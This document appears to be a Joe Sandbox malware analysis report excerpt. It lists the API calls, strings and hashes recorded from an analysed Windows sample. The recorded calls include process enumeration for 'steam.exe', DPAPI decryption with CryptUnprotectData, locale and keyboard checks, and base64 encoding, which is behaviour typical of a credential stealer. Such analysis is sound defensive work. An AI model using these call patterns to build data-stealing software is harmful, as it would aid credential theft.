                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: c7e03e2b4637c33537a46e025a60323ff5f8e8db1c03eff2b279156bf2bdde25
                                • Instruction ID: 0a9ae5a21dd2f7859b2138e75b56940deef33941d306d6a579598294c8534888
                                • Opcode Fuzzy Hash: c7e03e2b4637c33537a46e025a60323ff5f8e8db1c03eff2b279156bf2bdde25
                                • Instruction Fuzzy Hash: AC018F71A011249BD7219A60EC48FEE77ACEB09364F0001D5F949E1080EBB98A948BE1
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54B7F
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E54B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BA7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E54BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E54BFA
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 3d8f9c1b9a4a0c9de7522da9d725525f50f162121e5cf119dba48930ee4fcf2b
                                • Instruction ID: 825e7dbd91c253878a84aed1b782bb4721f2c641de6ff596c233e3e153732908
                                • Opcode Fuzzy Hash: 3d8f9c1b9a4a0c9de7522da9d725525f50f162121e5cf119dba48930ee4fcf2b
                                • Instruction Fuzzy Hash: AB318C716211059BCB32EF28FC85A9E77F9AF80319F406528FE45B7251CB34EC058BA0
                                APIs
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E62D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E62DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E62DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E62DEC
                                • LocalFree.KERNEL32(00000000), ref: 00E62FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: e9b96b10f1eeb06cc1cc2b94943c57c589b370278fee5795472bb7b881a6f48d
                                • Instruction ID: 1627766559f3c85a183e36fe047f8fe00a233492a96d8a40c5ce429dc14b8e77
                                • Opcode Fuzzy Hash: e9b96b10f1eeb06cc1cc2b94943c57c589b370278fee5795472bb7b881a6f48d
                                • Instruction Fuzzy Hash: 67B11870A40604CFC725CF14E548B95B7F2BB44369F29D1ADE508BB2A6D7769C82CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )3%$3b~$MOm$RL{$k)^$tYa`
                                • API String ID: 0-506928540
                                • Opcode ID: 21daf9c3ced7e86331efa9013b107be731febffbf649705d47e1199d41ad9ba1
                                • Instruction ID: 40523ed5b0d70885f3c9e511198e324e3ac4d4d5034cd38c5b5e375e80a1e215
                                • Opcode Fuzzy Hash: 21daf9c3ced7e86331efa9013b107be731febffbf649705d47e1199d41ad9ba1
                                • Instruction Fuzzy Hash: FBB217F3A0C2149FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C7744E63558018696
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E62C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 00E62C58
                                • wsprintfA.USER32 ref: 00E62C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 2db88540166748a00417d5a5bdf0d54b86831938fa011e35a6f9ca97cdf1999d
                                • Instruction ID: b1bc3aa0601e7439389e1423f20fcdfa1cab5826c3abf2c8d4c1fa805066fc35
                                • Opcode Fuzzy Hash: 2db88540166748a00417d5a5bdf0d54b86831938fa011e35a6f9ca97cdf1999d
                                • Instruction Fuzzy Hash: 2201F771E40604ABD7289B58DC09F6DBB69EB84721F004329F916E73C0D77919008BD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: la~$+w+l$gLZ~$[t$.G
                                • API String ID: 0-1658880353
                                • Opcode ID: 2ef84dc1ef24933dbbeecd17c79f878b24b934b7b2f3eb682be1477180bf8902
                                • Instruction ID: 98e8c52791f8260c7a8f7c49235a995b6c9b168b7ce3900e8d3ad8ddded7dfa2
                                • Opcode Fuzzy Hash: 2ef84dc1ef24933dbbeecd17c79f878b24b934b7b2f3eb682be1477180bf8902
                                • Instruction Fuzzy Hash: 36B2E4F3A0C2049FE3046E2DEC8567AFBE9EF94720F16492DE6C4C7740EA7598418697
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *s$/>'$RN$}|o$uN
                                • API String ID: 0-2582903438
                                • Opcode ID: 51d088f0134d9989a65dc45d2d12c4f254835e3d00bf1e762282ba0e43e5e3c6
                                • Instruction ID: 1deb5173b69b75f177716028e2a580de1aa714770b557ded59edb03ffe0dadfc
                                • Opcode Fuzzy Hash: 51d088f0134d9989a65dc45d2d12c4f254835e3d00bf1e762282ba0e43e5e3c6
                                • Instruction Fuzzy Hash: CBA2F6F3A0C6049FE304AE29EC8567AFBE5EF94720F16493DEAC4C3744EA3558458693
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E4775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E47765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E4778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E477AD
                                • LocalFree.KERNEL32(?), ref: 00E477B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 8710aa5f2f6cd57bf24b42c8fcf0d2d170a4e75f571cfe9ca1deb880af49a7d4
                                • Instruction ID: 278a29bdaf387a9dd4f2de05dd902701bbc9f625cbd03e7047d1f905036d30ed
                                • Opcode Fuzzy Hash: 8710aa5f2f6cd57bf24b42c8fcf0d2d170a4e75f571cfe9ca1deb880af49a7d4
                                • Instruction Fuzzy Hash: DF011275B503087FEB20DA94DC4AFAA7B78EB44B15F104155FB45FA2C4D6B5990087D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: S{w$.w$4F$|{g
                                • API String ID: 0-1075808752
                                • Opcode ID: 6a1d0470c4fd264bc5a565f0fec40380b8d152d5ca11d628cd3d693ae77d77b5
                                • Instruction ID: f36441cee97aa4a60c4a3163e0416782523a6ddf6945cfebae8ad19baff9d82e
                                • Instruction Fuzzy Hash: 09B207F3A0C2109FE314AE2DEC8567ABBE5EF94320F16493DEAC5D3744EA3558018796
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 5~C$I;$Kyz?$ntp
                                • API String ID: 0-2659641515
                                • Opcode ID: 0f61c7d6d6394a3fc24647df2f2e5ab93553d2dbf451b56e1587b65c0259899a
                                • Instruction ID: 4aff44530b2620fb1dbbec1695a344e569765706727c1bb978b4c90cec15edf5
                                • Instruction Fuzzy Hash: 03A215F360C3049FE3146E29EC8567AFBE9EF94320F1A493DEAC483744EA3558458697
                                APIs
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E63A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E63AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E63ABF
                                  • Part of subcall function 00E67310: lstrlen.KERNEL32(------,00E45BEB), ref: 00E6731B
                                  • Part of subcall function 00E67310: lstrcpy.KERNEL32(00000000), ref: 00E6733F
                                  • Part of subcall function 00E67310: lstrcat.KERNEL32(?,------), ref: 00E67349
                                  • Part of subcall function 00E67280: lstrcpy.KERNEL32(00000000), ref: 00E672AE
                                • CloseHandle.KERNEL32(00000000), ref: 00E63BF7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 51d7ebd1e548ed8c8fd68bbf1de95d20d6bfc939903d9e0d9bb4eae2a7a23fa5
                                • Instruction ID: e6211c432586ed558e3b3032dec15c5e8c94117b7243270729b5a702bf638a36
                                • Instruction Fuzzy Hash: 8A81F730941204CFC724CF28E948B95B7F1FB45369F29D1ADE449AB2A2D7769D82CF90
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00E4EA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00E4EA7E
                                • lstrcat.KERNEL32(00E6CFEC,00E6CFEC), ref: 00E4EB27
                                • lstrcat.KERNEL32(00E6CFEC,00E6CFEC), ref: 00E4EB49
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 992f3bdf30a58a2e52e107aaf589cb872ec6bb9bd1e8cad5dba678eb3c336674
                                • Instruction ID: 07b3f72b2ebed840b2d12c6b105b9480e96a1adb4381cf171d48ff1e2e02f4f8
                                • Instruction Fuzzy Hash: 2C31F575F00219ABDB209B58EC49FEEB77DEF84715F008165FA09F3240D7B15A048BA2
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00E640CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00E640DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E640E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00E64113
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: ea510bdb2714e87815ddc9bb806e67d9cee6f4068756e9b43072b78e3b435012
                                • Instruction ID: b6b8cb17399bb85885cfca67a0f84aa3e4eec3338ab27417dd1e674fe690618d
                                • Instruction Fuzzy Hash: 76015EB0600205ABDB208FA5EC49F6A7BADEF45325F108459BE4897240DA729940CB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00E6A3D0,000000FF), ref: 00E62B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00E62B96
                                • GetLocalTime.KERNEL32(?,?,00000000,00E6A3D0,000000FF), ref: 00E62BA2
                                • wsprintfA.USER32 ref: 00E62BCE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 926ec8e7f78fdeb9a87c0071e72ef07bc5fc5f1cc1f33e1cc76a1fe662bc2b59
                                • Instruction ID: 27eb8f62a42c28c7f2c4ae5f702d193ef7085f901464bfa8c96f6c93ccc00269
                                • Instruction Fuzzy Hash: BF012DB2D54128ABCB249BC99D49FBEB7BCFB4CB21F00411AF645A2280E77D5440C7B1
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E49B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E49B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E49B61
                                • LocalFree.KERNEL32 ref: 00E49B70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 60eb5349fa01372cacd3513eedfcd28c60dd5697a774bf4043a143e2da33f58e
                                • Instruction ID: 0f3ca642f2299244d9e1e880c11620c99ffb269cc12c1b1504ee483a72ec1eac
                                • Instruction Fuzzy Hash: 84F01D70750312ABE7311F64BC49F577BA8EF04B64F200154FA45FA2C4E7B59850CBA4
                                APIs
                                • CoCreateInstance.COMBASE(00E6B110,00000000,00000001,00E6B100,?), ref: 00E5CB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E5CB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 00E5CBC9
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: 3375ca2d99e00f6380ca8337163ad6783f975e306dee15ea8bab6d0e7d8110ad
                                • Instruction ID: d6490525ae383cbd737fb309c603444b893b36473e7b655a74919baaf013e71c
                                • Instruction Fuzzy Hash: 1F318471A40315BFD710DB94CC96FAAB7B99B88B11F104584FA04EB2D0D7B1AE44CB90
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E49B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E49BB3
                                • LocalFree.KERNEL32(?), ref: 00E49BD7
